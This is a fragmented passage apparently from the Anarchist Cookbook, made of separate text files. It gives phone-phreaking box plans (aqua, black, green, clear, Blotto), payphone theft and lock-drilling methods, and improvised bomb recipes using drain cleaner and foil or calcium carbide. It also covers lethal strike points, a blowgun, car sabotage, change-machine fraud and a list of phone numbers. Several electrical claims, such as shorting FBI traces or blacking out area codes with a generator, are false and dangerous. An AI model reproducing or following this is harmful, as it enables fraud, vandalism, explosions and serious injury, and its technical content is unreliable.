cal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Gunn Diode will generate microwaves when supplied with the 5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0 volt DC and enclosed in the correct size cavity (resonater). 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 to 3 terminal regulator can be used to get this voltage from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s 12v system. However, the correct construction and tuning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vity is difficult without good microwave measur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quipment. Police radars commonly operate on the K band at 22 ghz.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more often on the X band at 10.525 ghz. most microwave intru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arms and motion detectors (mounted over automatic door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permarkets &amp; banks, etc.) contain a Gunn ty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ansmitter/receiver combination that transmits about 10 kilowat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10.525 ghz. These units work perfectly as jammers. If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not get one locally, write to Microwave Associate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rlington, Massachusettes and ask them for info on 'Gunnplex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ham radio use. When you get the unit it may be mounted in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astic box on the dash or in a weather-proff enclosure behin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ASTIC grille. Switch on the power when on an open highway.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it will not jam radar to the side or behind the car so don't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eeding past the radar trap. An interesting phenomena you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ice is that the drivers who are in front of you who are u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tectors will hit their brakes as you approach large metal sig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bridges. Your signal is bouncing off of these object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ggering their radar detectors!       HAVE F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 If you are interested in this sort of thing, get a cop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PULAR COMMUNICATIONS. The ads in there tell you where you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t all kinds of info on all kinds of neat equipment for all ki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neat th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oke Bomb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is the recipe for one helluva smoke bom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parts su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parts potassium nitrate (Salt Pe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at this mixture over a LOW flame until it melts, stirring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ur it into a future container and, before it solidifies, imbed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ew matches into the mixture to use as fuses. One pound of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uff will fill up a whole block with thick, white smo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Box Bomb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wo litre bottle of chlorine (must contain sodium hypochlo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mall amount of sug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mall amount of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x all three of these in equal amounts to fill about 1/10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tle. Screw on the lid and place in a mailbox. It's hard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lieve that such a small explosion will literally rip the mailbo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half and send it 20 feet into the air! Be careful doing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ugh, because if you are caught, it is not up to the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se mailbox you blew up to press charges. It is up to the c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asiest way to hotwire car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t in the car. Look under the dash. If it enclosed, forge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less you want to cut through it. If you do, do it nea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gnition. Once you get behind or near the ignition look for tw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d wires. In older cars red was the standard color, if not, l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wo matched pairs. When you find them, cross them and t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make Napalm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our some gas into an old bowl, or some kind of contain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Get some styrofoam and put it in the gas, until the gas wo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t anymore. You should have a sticky syr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ut it on the end of something (don't touch it!!). The un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uff lasts a long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make a fertilizer bomb                       by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gredi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ewspa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Fertilizer (the chemical kind, GREEN THUMB or ORCH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tt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iesel fu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ke a pouch out of the newspaper and put some fertilizer i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put cotton on top. Soak the cotton with fuel. Then light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un like you have never ran before! This blows up 500 square fe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don't do it in an alley!!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nnis Ball Bomb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gredi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trike anywhere matc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 tennis b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 nice sharp kn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uct ta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eak a ton of matchheads off. Then cut a SMALL hole in the tenn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ll. Stuff all of the matchheads into the ball, until you c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t any more in. Then tape over it with duct tape. Make sure i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l nice and tight! Then, when you see a geek walking dow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et, give it a good throw. He will have a bl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kette Bomb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 dis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ciss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hite or blue kitchen matches (they MUST be these col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lear nail pol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arefully open up the diskette (3.5" disks are best for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move the cotton covering from the ins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Scrape a lot of match powder into a bowl (use a wooden scra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al might spark the matchpow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fter you have a lot, spread it evenly on the dis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sing the nail polish, spread it over the match mix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Let it d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Carefully put the diskette back together and use the nail pol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al it shut on the inside (where it came ap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hen that disk is in a drive, the drive head attempts to r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isk, which causes a small fire (ENOUGH HEAT TO MELT THE DIS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IVE AND FUCK THE HEAD UP!!). ahahahahaha! Let the fuckhead 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fix THAT!!!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isted Phone Number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a couple of different ways of doing this. Let's see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one will help: Every city has one or more offices dedic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assigning numbers to the telephone wire pairs. These offi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called DPAC offices and are available to service reps who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stalling or repairing phones. To get the DPAC number, a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p would call the customer service number for billing inform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town that the number is located in that he is trying to g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unlisted number of. (Got that?) The conversation would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thing like this: "Hi, Amarillo, this is Joe from Anyt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siness office, I need the DPAC number for the south sid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wn." This info is usually passed out with no problems, so...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irst person you call doesn't have it, try another. REME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one has ANY IDEA who the hell you are when you are talking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hone, so you can be anyone you damn well please! (hehehehe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call the DPAC number, just tell them that you need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sting for either the address that you have, or the name. DPA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 NOT SHOW WHETHER THE NUMBER IS LISTED OR UNLISTED!! Also,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going to make a habit of chasing numbers down, you m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nt to check into geting a criss-cross directory, which lis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one numbers by their addresses. It costs a couple-a-hundred bu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t is well worth it if you have to chase more than one or tw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down!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ses                            brought to you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ould be surprised how many files are out there that use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alls under the category of a "fuse." They assume that you j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a few lying around, or know where to get them. Well, in s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ts of the country, fuses are extremely hard to come by...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file tells you how to make your own. Both fuses presen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fairly simple to make, and are fairly reli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OW BURNING F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pprox. 2 inches per minu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tton string or 3 shoela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otassium Nitrate or Potassium Chlo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ranulated sug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ash the cotton string or showlaces in HOT soapy water,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se with fresh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ix the following together in a glass bow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part potassium nitrate or potassium chlo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part granulated su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parts hot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ak strings or shoelaces in this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wist/braid 3 strands together and allow them to d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heck the burn rate to see how long it actually tak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ST BURNING F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40 inches per minu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ft cotton st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e black powder (empty a few shotgun she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llow dish or p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oisten powder to form a pas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wist/braid 3 strands of cotton toge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ub paste into string and allow to d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heck the burn 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make Potassium Nitrat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tassium Nitrate is an ingredient in making fuses, among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Here is how you mak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5 gallons of nitrate bearing earth or other mate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 cup of wood as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cket or other similar container about 4-5 gallons in volu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pieces of finely woven cloth, each a bit bigger tha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ttom of the buck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llow dish or pan at least as large in diameter as the buck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llow, heat resistant contai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gallons of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hing to punch holes in the bottom of the buck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gallon of any type of alcoh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heat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per &amp; ta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unch holes on the inside bottom of the bucket, so that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al is"puckered" outward from the bott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pread cloth over the holes from the bott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lace wood ashes on the cloth. Spread it out so that it cov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ntire cloth and has about the same thickn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lace 2nd cloth on top of the wood as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lace the dirt or other material in the buck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lace the bucket over the shallow container. NOTE: It may n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pport on the bottom so that the holes on the bottom are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Boil water and pour it over the earth very slowly. Do NOT p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all at once, as this will clog the filter on the bott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Allow water to run through holes into the shallow dish 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tt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e sure that the water goes through ALL of the ear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llow water in dish to cool for an hour or s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Carefully drain the liquid in the dish away, and discar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udge in the bott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Boil this liquid over a fire for at least two hours. Sm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ains of salt will form - scoop these out with the paper as th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hen the liquid has boiled down to 1/2 its original volume l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s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After 1/2 hour, add equal volume of the alcohol; when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xture is poured through paper, small white crystals appear.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he posassium nit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r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dissolve crystals in small amount of boiling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move any crystals that appe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our through improvised filter then heat concentrated solu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ryn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pread out crystals and allow to d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oding lightbulb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bulb (100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cket (du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4 cup soap chi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powder! (open some shotgun she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4 cup kerosene orgaso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hesive t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er or small blowtor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 for a simple exploding lightbul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rill a small hole in the top of the bulb near the threa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Carefully pour the blackpowder into the hole. Use enough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t touches the fila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Insert into socket as normal (make sure the light is off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se YOU will be the victi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et the hell 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 for a Napam Bul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at kerosene/gasoline in a double boi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elt soap chips, stirring slow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ut somewhere and allow to co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Heat the threads of the bulb VERY carefully to melt the g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move threads, slowly drawing out the filament. Do NOT break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ap electrical igniters and/or the filament or this won't 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our the liquid into the bulb, and slowly lower the fila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ck down into the bulb. Make sure the filament is dipped in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Re-glue the threads back on. Insert it into a socket freque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by the victim and get the hell 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victim flips the switch, he will be in for a BIG surpri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fun!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 water igniter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ck of 10 silicon diodes (available at Radio Shack. you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know you got the right ones if they are very, very small gla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bjec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ck of matc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cand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Light the candle and allow a pool of molten wax to form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Take a single match and hold the glass part of a single di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ainst the head. Bend the diode pins around the matchhead so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wraps in an upward direction and thensticks out to the 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the same with the other wire, but in a downward directi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odes should now be hugging the matchhead, but its wires MUST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UCH EACH O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Dip the matchhead in wax to give it a water-proof coat. The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 under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peat to make as many as you wa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use th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these little dudes are hooked across a 6v battery, the di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ches what is called breakdown voltage. When most electric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ponents reach this voltage, they usually produce great amou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heat and light, while quickly melting into a little blob.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at is enough to ignite a matchhead. These are recommended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underwater, where most other igniters refuse to work. ENJO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e-brew blast cannon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plastic drain pipe, 3 feet long, at least 3 1/2 inche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smaller plastic pipe, about 6 inches long, 2 inche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large lighter, with fluid refills (this gobbles it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pipe cap to fit the large pipe, 1 pipe cap to fit the sm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i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feet of bell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SPST rocker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6v polaroid pot-a-pulse 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5v relay (get this at Radio Sh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ical T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free afterno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ut the bell wire into three equal pieces, and strip the e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Cut a hole in the side of the large pipe, the same diameter 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mall pipe. Thread the hole and one end of the small pi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should screw together easi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Take a piece of scrap metal, and bend it into an "L" sh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attach it to the level on the ligh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s switch is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er!!&lt;---metal l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every time you pull the 'trigger' gas should flow freely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ighter. You may need to enlarge the 'gas port' on y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er, if you wish to be able to fire more rapid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nnect two wires to the two posts on the swi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Cut two holes in the side of the smaller tube, one fo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witch on the bottom, and one for the metal piece on the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mount the switch in the bottom, running the wires up and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t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Mount the lighter/trigger in the top. Now the switch shou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ock easily, and the trigger should cause the lighter to pour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s. Re-screw the smaller tube into the larger one, hold dow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igger a bit, let it go, and throw a match in there. If all go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you should hear a nice big 'THU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et a hold of the relay, and take off the t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lt;--- the center object is the metal finger in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he re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l----------------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nect (1) to one of the wires coming from the switch. Conn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to (4), and connect (5) to one side of the battery. Conn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maining wire from the switch to the other side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ttery. Now you should be able to get the relay to make a li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zzing' sound when you flip the switch and you should see s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ny little spar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Now, carefully mount the relay on the inside of the large pi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wards the back. Screw on the smaller pipe, tape the battery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ide of the cannon barrel (yes, but looks aren't everyth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You should now be able to let a little gas into the barrel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 it off by flipping the swi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ut the cap on the back end of the large pipe VERY SECUR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re now ready for the first trial-ru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t something very, very large into the barrel, just so tha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ts 'just right'. Now, find a strong guy (the recoil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bably knock you on your ass if you aren't careful!). Put on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ulderpad, earmuffs, and possibly some other protective cl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ust the Jolly Roger! You are going to need it!). Hol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igger down for 30 seconds, hold on tight, and hit the sw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luck and the proper adjustments, you should be able to put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zed orange through 1/4 or plywood at 25 fe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fun!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mical Equivalency list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acia..................................................Gum Arab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etic Acid................................................Vine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Oxide..............................................Alum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Potassium Sulphate...................................Alu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Sulfate..............................................Alu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monium Carbonate.......................................Hartsho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monium Hydroxide.........................................Ammon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monium Nitrate........................................Salt P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monium Oleate.......................................Ammonia So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ylacetate............................................Bananna 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rium Sulfide...........................................Black A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on Carbinate.............................................Cha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ontetrachloride.................................Cleaning Flu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um Hypochloride..............................Bleaching Pow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um Oxide.................................................L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um Sulfate...................................Plaster of Par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onic Acid..............................................Seltz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tyltrimethylammoniumbromide........................Ammonium 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hylinedichloride.....................................Dutch Flu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rric Oxide.............................................Iron R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rfuraldehyde............................................Bran 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ucose.................................................Corn Syr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phite...............................................Pencil L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chloric Acid....................................Muriatic Ac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gen Peroxide.........................................Perox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Acetate.........................................Sugar of L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Tero-oxide...........................................Red L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nesium Silicate............................................Tal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nesium Sulfate.......................................Epsom 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ylsalicylate..................................Winter Green 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phthalene..............................................Mothb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enol...............................................Carbolic Ac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ssium Bicarbonate..............................Cream of Tar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ssium Chromium Sulfate..............................Chromealu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ssium Nitrate.......................................Salt P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Oxide..................................................S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Bicarbonate.....................................Baking So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Borate................................................Bor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Carbonate......................................Washing So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Chloride...............................................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Hydroxide...............................................Ly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Silicate..............................................Gl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Sulfate......................................Glauber's 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Thiosulfate.............................Photographer's Hyp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lfuric Acid.........................................Battery Ac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rose.................................................Cane Su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inc Chloride.......................................Tinner's Flu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inc Sulfate.........................................White Vitri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Tap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e is some info on phone taps. In this file is a schematic fo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mple wiretap &amp; instructions for hooking up a small tape recor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ol relay to the ph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rst, I will discuss taps a little. There are many diffe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pes of taps. there are transmitters, wired taps, and ind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ps to name a few. Wired and wireless transmitters must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ysically connected to the line before they will do any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ce a wireless tap is connected to the line,it can transmi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versations over a limited reception range. The phones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use can even be modifies to pick up conversations in the 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ransmit them too! These taps are usually powered off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line, but can have an external power source. You can get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on these taps by getting an issue of Popul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munications and reading through the ads. Wired taps, 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ther hand, need no power source, but a wire must be run from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to the listener or to a transmitter. There are obv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vantages of wireless taps over wired ones. There is one typ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reless tap that looks like a normal telephone mike. All you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do is replace the original mike with thisand itwill transm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conversations! There is also an exotic type of wired tap kn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the 'Infinity Transmitter' or 'Harmonica Bug'. In order to h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of these, it must be installed inside the phone. When some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s the tapped phone &amp; *before* it rings,blows a whistle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ine, the transmitter picks up the phone via a relay. The mi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 phone is activated so that the caller can hear all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versations in the room. There is a sweep tone test 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15/BUG-1111 which can be used to detect one of these taps. If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these is on your line &amp; the test # sends the correct ton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l hear a click. Induction taps have one big advantage over t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must be physically wired to the phone. They do not have to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uching the phone in order to pick up the conversation. They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 same principle as the little suction-cup tape recor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kes that you can get at Radio Shack. Induction mikes can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oked up to a transmitter or be wi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is an example of industrial espionage using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alesman walks into an office &amp; makes a phone call. He fak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nversation, but when he hangs up he slips some foam rub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ubes into the cradle. The called party can still hear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versations in the room. When someone picks up the phon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bes fall away unnotic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tap can also be used on a phone to overhear what your modem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ing when you are wardialing, hacking, or just plain calling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bs (like the White Ruins! Denver, Colorado! 55 megs on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ari! Macintosh! Amiga! Ibm! CALL IT! 303-972-8566! By the way,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d this ad without the sysops consent or knowled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is the schemat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p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00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Inp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100K pot is used for volume. It should be on its high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ast resistance) setting if you hook a speaker acros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tput. but it should be set on its highest resistance for a t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rder or amplifier. You may find it necessary to add an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0 - 40K. The capacitor should be around .47 MFD. It's o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rpose is to prevent the relay in the phone from tripping &a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nking that you have the phone off of the hook. the audio outp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ansformer is available at Radio Shack. (part # 273-138E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put). The red &amp; the white wires go to the output device. You m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nt to experiment with the transformer for the best outp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oking up a tape recorder relay is easy. Just hook one of the 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res (usually red) to the the end of one of the relay &amp; the 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 just loop around. This bypasses it. It should look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 #275-004 from Radio Shack works f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think that you line is tapped, the first thing to do is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ysically inspect the line yourself ESPECIALLY the phones.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get mike replacements with bug detectors built in. However,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not trust them too much. It is too easy to get a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more inf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GS AND ELECTRONIC SURVEILANCE from Desert Publi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TO AVOID ELECTRONIC EAVESDROPPING &amp; PRIVACY INVASION. I do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member who this one is from... you might want to try Palad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make a landmin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rst, you need to get a pushbutton switch. Take the wires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connect one to a nine volt battery connector and the other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olar igniter (used for launching model rockets). A very th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ece of stereo wire will usually do the trick if you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sperate, but I recommend the igniter. Connect the other wir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ine-volt battery to one end of the switch. Connect a w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the switch to the other lead on the solar igni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witch-----------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olar  igni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plos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connect the explosive (pipe bomb, m-80, CO2 bomb, etc.)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gniter by attaching the fuse to the igniter (seal it with sco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pe). Now dig a hole; not too deep but enough to cover all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Think about what direction your enemy will be coming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plant the switch, but leave the button visible (not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sible!). Plant the explosive about 3-5 feet away from the sw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there will be a delay in the explosion that depends on h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rt your wick is, and, if a homemade wick is being used, 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rning speed. But if you get it right... and your enemy is cl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BBBBBBBOOOOOOOOOOOOOOOOOOOOOOOOMMMM! hahahah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different kind of Molitoff Cocktail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is how you do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et a coke bottle &amp; fill it with gasoline about half fu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ram a piece of cloth into the neck of it nice and ti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et a chlorine tablet and stuff it in there. You are going to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force it because the tablets are bigger than the opening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t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Now find a suitable victim and wing it in their direction. Whe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s the pavement or any surface hard enough to break it, and the chlor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gasoline mix..... BO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fun!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Systems Tutorial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start off, we will discuss the dialing procedures for domes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well as international dialing. We will also take a look at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numbering pl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th American Numbering Pl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North America, the telephone numbering plan is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a 3 digit Numbering Plan Area (NPA) code , ie, area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 a 7 digit telephone # consisting of a 3 digit Central Off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 code plus a 4 digit st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10 digits are called the network address or destin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 It is in the format o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a Code         Tele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X             NXX-XXX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 = a digit from 2 to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the digit 0 or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 = a digit from 0 to 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 your telephone book or the seperate listing of area co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nd on many bbs's. Here are the special area codes (SA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10 - TWX (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610 - TWX (Cana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00 - New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10 - TWX (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00 - WA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10 - TWX (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00 - DIAL-IT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10 - TWX (US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ther area codes never cross state lines, therefore each st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ust have at least one exclusive NPA code. When a community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lit by a state line, the CO #'s are often interchangeable (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dial the same number from two different area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WX (Telex II) consists of 5 teletype-writer area codes. They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wned by Western Union. These SAC's may only be reached via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WX machines. These run at 110 baud (last I checked! They are mo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ly faster now!). Besides the TWX #'s, these machines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outed to normal telephone #'s. TWX machines always respond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 answerback. For example, WU's FYI TWX # is (910) 279-5956.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swerback for this service is "WU FYI MAW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don't want to but a TWX machine, you can still send TW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ssages using Easylink [800/325-4112]. However you are gonna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ck your way onto this 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00 is currently used by AT&amp;T as a call forwarding service. I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ed towards salesmen on the run. To understand how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rks, I'll explain it with an example. Let's say Joe Q. Salespi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rks for AT&amp;T security and he is on the run chasing a phrea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ound the country who royally screwed up an important COSMO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ystem. Let's say that Joe's 700 # is (700) 382-5968. Every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 goes to a new hotel (or most likely SLEAZY MOTEL), he dial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ecial 700 #, enters a code, and the number where he is stay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if his boss received some important info, all he would do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al (700) 382-5968 and it would ring wherever Joe last progam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to. Neat, hu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SAC is one of my favourites since it allows for toll f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s. INWARD WATS (INWATS), or Inward Wide Ar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lecommunications Service is the 800 #'s that we are all famili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800 #'s are set up in service areas or bands. There are 6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Band 6 is the largest and you can call a band 6 #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where in the US except the state where the call is termin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is why most companies have one 800 number for the count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another one for their state.) Band 5 includes the 4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iguous states. All the way down to band 1 which includes o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tates contiguous to that one. Therefore, less people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ch a band 1 INWATS # than a band 6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rastate INWATS #'s (ie, you can call it from only 1 st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ways have a 2 as the last digit in the exchange (ie, 800-NX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XXXX). The NXX on 800 #'s represent the area where the business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cated. For example, a # beginning with 800-431 would termin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a NY C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s always end up in a hunt series in a CO. This means tha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ies the first # allocated to the company for their 800 lines;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busy, it will try the next #, etc. You must have a minim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2 lines for each 800 #. For example, Travelnet uses a h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ries. If you dial (800) 521-8400, it will first try th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ociated with 8400; if it is busy it will go to the n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vailable port, etc. INWATS customers are billed by the number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urs of calls made to the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TWATS (OUTWARD WATS): OUTWATS are for making outgoing cal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ly. Largecompanies use OUTWATS since they receive bulk-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counts. Since OUTWATS numbers cannot have incoming calls, th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in the format o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00) *XXX-XXX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 is the digit 0 or 1 (or it may even be designated b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ter) which cannot be dialed unless you box the call. The *X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entifies the type of service and the areas that the company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WATS + OUTWATS = WATS EXTEN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DIAL-IT SAC is a nationwide dial-it service. It is use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ing television polls and other stuff. The first min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urrently costs an outrageous 50-85 cents and each addition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ute costs 35-85 cents. Hell takes in a lot of revenue this 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900) 555-1212 to find out what is currently on this serv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identify the switching office where the call is to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ted. The following CO codes are reserved nationw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55 - directory assi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44 - time. These are now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36 - weather the 976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50 - future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58 - plant t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59 - plant t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70 - plant test (tempor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76 - DIAL-IT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so, the 3 digit ANI &amp; ringback #'s are regarded as plant t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are thus reserved. These numbers vary from area to ar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not dial a 0 or 1 as the first digit of the exchange c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less using a blue box!). This is due to the fact that the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changes (000-199) contains all sorts of interesting shit such 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erence #'s, operators, test #'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5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the services that are currently used by the 950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00 - SP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22 - MCI Execu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33 - US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44 - All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6 - Lexit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88 - SBS Sky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SCC's (Specialized Common Carriers) are free from fort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ones! Also, the 950 exchange will probably be phased out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troduction of Equal Ac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t Te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include ANI, Ringback, and other various te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7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al 976-1000 to see what is currently on the service. Also, m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s's have listings of these numb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11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ll is trying to phase out some of these, but they still exist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area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11 - international dialing pref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11 - coin refund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11 - directory assi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611 - repair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11 - business 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11 - EMERGENC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Dia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International Dialing, the world has been divided into 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ing zones. To make an international call, you must fi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International Prefix + Country code + Natio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North America, the international dialing prefix is 011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tion-to-station calls. If you can dial International #'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ectly in your area then you have International Direct Dist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ing (IDD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untry code, which varies from 1 to 3 digits, always ha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rld numbering zone as the first digit. For example, the coun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 for the United Kingdom is 44, thus it is in world numbe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zone 4. Some boards may contain a complete listing of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try codes, but here I give you a fe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 North America (US, Canada,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 - Egy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58 - Mozambiq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4 - Sp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9 - Ger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2 - Mexico (southern por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 - USS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1 - Jap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8 - Iran (call &amp; hassle those basta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call from an area other than North America, the forma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nerally the same. For example, let's say that you wanted to c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hite House from Switzerland to tell the prez that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ed bank account is overdrawn (it happens, you know! ha h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rst you would dial 00 (the SWISS international dialing refi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1 (the US country code), followed by 202-456-1414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tional # for the White House. Just ask for Georgy and give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ad ne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so, country code 87 is reserved for Maritime mobile service, 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ing shi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71 - Marisat (Atlant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71 - Marisat (Pacif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72 - Marisat (Ind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North America there are currently 7 no. 4 ESS's that perfo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uty of ISC (Inter-nation Switching Centers).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ernational calls dialed from numbering zone 1 will be rou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one of these "gateway cities".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2 - White Plains, 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3 - New York, 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4 - Pittsburgh, P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5 - Orlando, F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6 - Oakland, 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7 - Denver, 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8 - New York, N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18X series are operator routing codes for overseas access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furthur discussed with blue boxes). All international calls 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ignaling service called CCITT.It is an international stand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signa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 there you go for now! If you wanna read more about this, r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 two which is the next file #36 in the Jolly Roger's cookb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Systems Tutorial part II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t II will deal with the various types of operators, off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irarchy, &amp; switching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many types of operators in the network and the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on ones will be discus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SPS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SPS [(Traffic Service Position System) ass opposed to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tty Phone Service] Operator is probably the bitch (or bast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he female libertationists out there) that most of us are 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ing to deal with. Here are his/her responsi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Obtaning billing information for calling card or third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Identifying called customer on person-to-person ca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Obtaining acceptance of charges on collect ca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Identifying calling numbers. This only happens when the cal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is not automatically recorded by CAMA (Centralized Automa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ssage Accounting) &amp; forwarded from the local office. This cou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caused by equipment failures (ANIF- Automatic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entification Failure) or if the office is not equipped for CA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I- Operator Number Ident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I once has an equipment failure happen to me &amp; the TSPS opera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me on and said, "What # are you calling FROM?" Out of curio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ave her the number to my CO, she thanked me &amp; then I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nected to a conversation that appeared to be between a frame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 his wife. Then it started ringing the party I wanted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iginally call &amp; everyone phreaked out (excuse the pun).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mediately dropped this dual line confer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uld not mess with the TSPS operator since she KNOWS whi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 that you are calling from. Your number will show up on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0-digit LED read-out (ANI board). She also knows whether or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are at a fortress phone &amp; she can trace calls quite readi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all of the operators, she is one of the MOST DANGERO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WARD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operator assists your local TSPS ("0") operatorin connec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s. She will never question a call as long as the call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ing HER SERVICE AREA. She can only be reached via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erators or by a blue box. From a blue box, you would d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P+NPA+121+ST for the INWARD operator that will help you conn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 calls within that NPA only. (Blue Boxing will be discussed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utur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Y ASSISTANC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the operator that you are connected to when you dial: 4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NPA-555-1212. She does not readily know where you are cal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She does not have access to unlisted numbers, but she DO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if an unlisted # exists for a certain li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is also a directory assistance operator for deaf people wh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e teletypewriters. If your modem can transfer BAUDOT [(45.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ud). One modem that I know of that will do this is the Apple C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coustic or the Atari 830 acoustic modem. Yea I know they are h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find... but if you wanna do this.. look around!) then you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 him/her up and have an interesting conversation. The #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855-1155. They use the standard Telex abbreviations such as G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go ahead. they tend to be nicer and will talk longer than y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gular operators. Also, they are more vulnerable into be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lked out of information through the process of "soc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gineering" as Chesire Catalyst would pu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nfortunately, they do not have access to much. I o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llshitted with one of these operators a while back and I f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t that there are 2 such DA offices that handle TTY. One i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iladelphia and the other is in California. They have approx. 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erators each. most of the TTY operators think that their job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ing (based on an official "BIOC poll"). They also feel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are under-paid. They actually call up a regular DA #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ss your request (sorry, no fancy compu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ther operators have access to their own DA by dia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P+NPA+131+ST (M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N/A operato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N/A Operators are operators that do exactly the opposite of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ectory assistance operators are for. In my experience, the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erators know more than the DA op's do &amp; they are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sceptable to "social engeneering." It is possible to bullshit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N/A operator for the NON-PUB DA # (ie, you give them the name &a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give you the unlisted number. See the article on unlis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s in this cookbook for more info about them.). This is d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the fact that they assume that you are a fellow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mployee. Unfortunately, the AT&amp;T breakup has resulted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up of a few NON-PUB DA #'s and policy changes in CN/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CEPT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ntercept operator is the one that you are connected to w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notenough recordings available to tell you that th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s been disconnected or changed. She usually says, "What #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in'?" with a foreign accent. This is the lowest opera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feform. Even though they don't know where you are calling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is a waste or your time to try to verbally abuse them si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usually understand very little English any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identally, a few area DO have intelligent INTERCEPT Operato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Operato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there are the: MObile, Ship-to-Shore, Conference, Mar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erify, "Leave Word and Call Back," Rout &amp; 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P+800+141+1212+ST), &amp; other special operators who have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rpose or another in the ne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blems with an Operator&gt; Ask to speak to their supervisor...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tter yet the Group Chief (who is the highest ranking official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office) who is the equivalent of the Madame ina whoreho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the way, some CO's that willallow you to dial a 0 or 1 a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th digit, will also allow you to call special operators &amp;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n Tel. Co. #'s without a blue box. This is ver rare, though!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212-121-1111 will get you a NY Inward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Hierarch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 switching office in North America (the NPA system),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igned an office name and class. There are five classe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fices numbered 1 through 5. Your CO is most likely a class 5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office. All long-distance (Toll) calls are switched by a to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fice which can be a class 4, 3, 2, or 1 office. There is also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ass 4X office callen an intermediate point. The 4X office i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gital one that can have an unattended exchange attached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n as a Remote Switching Unit (RS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ollowing chart will list the Office #, name, &amp; how man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se office exist (to the best of my knowledge) in North Ameri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ss                 Name           Abb          # Exi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1          Regional Center          RC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2          Sectional Center         SC                   6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3          Primary Center           PC                  23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4          Toll Center              TC                1,3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4P         Toll Point               TP                 n/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4X         Intermediate Point       IP                 n/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5          End Office               EO               19,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6          RSU                     RSU                 n/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connecting a call from one party to another, the switc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quipment usually tries to find the shortest route betwee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ass 5 end office of the caller &amp; the class 5 end office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ed party. If no inter-office trunks exist between the tw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ties, it will then move upward to the next highest office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rvicing calls (Class 4). If the Class 4 office cannot handl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 by sending it to another Class 4 or 5 office, it will then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nt to the next highest office in the hierarchy (3).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witching equipment first uses the high-usage interoffice tru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oups, if they are busy then it goes to the fina; trunk groups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ext highest level. If the call cannot be connected, you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bably get a re-order [120 IPM (interruptions per minute) bus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gnal] signal. At this time, the guys at Network Operations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bably shitting in their pants and trying to avoid the drea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Dreadlock (as seen on TV!).</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is also interesting to note that 9 connections in tandem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ed ring-around-the-rosy and it has never occured in tele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tory. This would cause an endless loop connection [a neat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lly screw up the ne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10 regional centers in the US &amp; the 2 in Canada are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erconnected. they form the foundation of the entire tele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Since there are only 12 of them, they are listed be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ss 1 Regional Office Location   NP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llas 4 ESS                       2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ne, PA                          2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ver 4T                          30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na No. 2SP1-4W (Canada)        30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 Louis 4T                       3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dale, GA                       40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ttsburgh 4E                      4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treal No. 1 4AETS (Canada)      50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it for now! More info to come Future update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okbook! Have fun!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 Alliance Teleconferencing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phile will deal with accessing, understanding and using the Alli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nferencing Systems.... it has many sections and for best use sh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printed out...enjo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i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iance Teleconferencing is an independant company which allows the gen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to access and use it's conferencing equipment.  Many rumors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n floating apound that Alliance is a subsidary of AT&a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hey are wrong.  As stated above, Alliance is an entirely independ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They use sophisticated equipment to allow users to talk to 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at o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iance is in the 700 exchange, thus it is not localized, well,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ay.  Alliance is only in certain states, and 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dents of these certain states can access by dialing direct.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 will be discussed in a later chapter.  The numbers for alliance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00-456-1000 (chica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01 (los ange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02 (chica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03 (houst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0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0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00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00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cations of the first 4 numbers are known and i have stated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 the numbers in the 200x and 300x are not definately kn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mor has it that the pattern repeats itself but this has not been prov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stated before, Alliance is only in certain stated and only these st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access them via dialing direct.  However, dialing direct causes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dence to be charged for the conference and conference bills are not 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fore, many ways have been discovered to start a conference with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it billed to ones house.  They ar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Dialing through a PB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Incorporating a Blu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Billing to a lo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Billing to a forwarded c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sure there are many more but these are the four i will deal wi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ing through a PB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bably the easiest method of creating a free conference is through a PB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call one in a state that has Alliance, input the PBX's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9 for an outside line and then dial alli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example of this would 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X: 800-241-49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t answers it will give you a tone.  At this tone input you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 123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this you will receive another tone, now dial 9 for an outside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ill now hear a dial tone.  Simply dial Alliance from this poin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ference will be billed to the PB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a Blu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rather simple way of starting a conference is with a Blu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procedure is how to box a con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a number to box off of.  In this example we will use 609-609-60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party answers hit 2600hz.  This will cause the fone compan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ment to think that you have hung up.  You will hear a &lt;beep&gt;&lt;kerchunk&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ave now 'seized' a trunk.  After this, switch to multi-frequ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d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P-0-700-456-x00x-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P=KP tone on Blu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variable between 1 and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ST tone on Blu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quipment now thinks that the operator has dialed Alliance from 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board and the conference shall be billed there.  Since Blue Box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such a large topic, this is as far as I will go into it's u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lling to a lo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ird method of receiving a free conference is by billing out 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p.  A loop is 2 numbers that when two people call, they can ta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each other.  You're saying woop-tee-do right? Wrong! Loops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very&gt; usefull to phreaks.  First, dial alliance direct.  After go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beginning procedure, which will be discussed later in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torial, dial 0 and wait for an Alliance operator.  When she answ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her you would like to bill the conference to such and suc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A loop where your phriend is on the other side) She will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that number to receive voice ver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course your phriend will be waiting and will accept the char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us, the conference is billed to the lo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lling to call for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dial a number that is call forwarded, it is first answered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location, then forwarded.  The original location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 up if 2600hz is received from only ond end of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fore, if you were to wait after the forwarded residence answe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ould receive the original location's dial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am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800-325-406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riginal residence would answer, then forward the call, a seco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of ringing would be heard.  When this second residence answ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wait until they hang up.  After about twenty seconds you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receive the original residence's dial tone since it heard 2600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one end of the line.  Simply dial Alliance from this point a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erence will be billed to the original resid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are the four main ways to receive a free conference.  I am s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y more exist, but these four are quite handy themsel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on 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Alliance answers you will hear a two-tone combination.  This is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of saying 'How many people do you want on the conference du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type in a 2-digit combination, depending on what bridge of Alli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re on, between 10 and 59.  After this either hit '*' to cance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erence size and inout another or hit '#' to contin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re now in Alliance Teleconferencing and are only seconds awa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your own roaring conference going stro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ing in Confere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ial your first conferee, dial 1+npa+pre+suff and await his/her answ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pa=area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pref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ff=suff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number is busy, or if no one answers simply hit '*' and your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e aborted.  But, if they do answer, hit the '#' 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ill add them to the con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commence dialing other confere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ining Your Con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join your conference from control mode simply hit the '#' k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in a second or two you will be chatting with all your budd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o back into control mode, simply hit the '#' key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ring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ransfer control to another conferee, go into control mode, hi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6+1+npa+pre+suff of the conferee you wish to give control to. If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ish to abort this transfer hit the '*' k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note&gt;:Transfer of control is often not available.  When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ive a message stating this, you simply cannot transfer contr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ted Confer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quest a muted conference simply hit the 9 key.  I am not exac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e what a muted conference is but it is probably a way to keep unwan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vesdroppers from listening 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ing Alliance Opera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dial 0 as you would from any fone and wait for the operator to answ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ing Your Con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end your conference all together, that is kick everyone inclu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self off, go into control mode and hit '*'...after a few seco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hang up.  Your conference is o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Alliance Operators Danger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t in the least.  The worst they can do to you while you are hav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conference is drop all conferees including yourself.  This is in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harmful, just a little aggrava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iance and Trac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iance can trace, as all citizens of the United States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is has to all be pre-meditated and AT&amp;T has to be called and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lly a large hastle, therefore, it is almost never done.  Alliance simp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 not want it known that teenagers are phucking them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sort of safety equipment Alliance has on-line is a simple p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ster.  This little device simply records all the numbers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erees dialed.  No big deal.  All Alliance can do is call up that pers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threaten 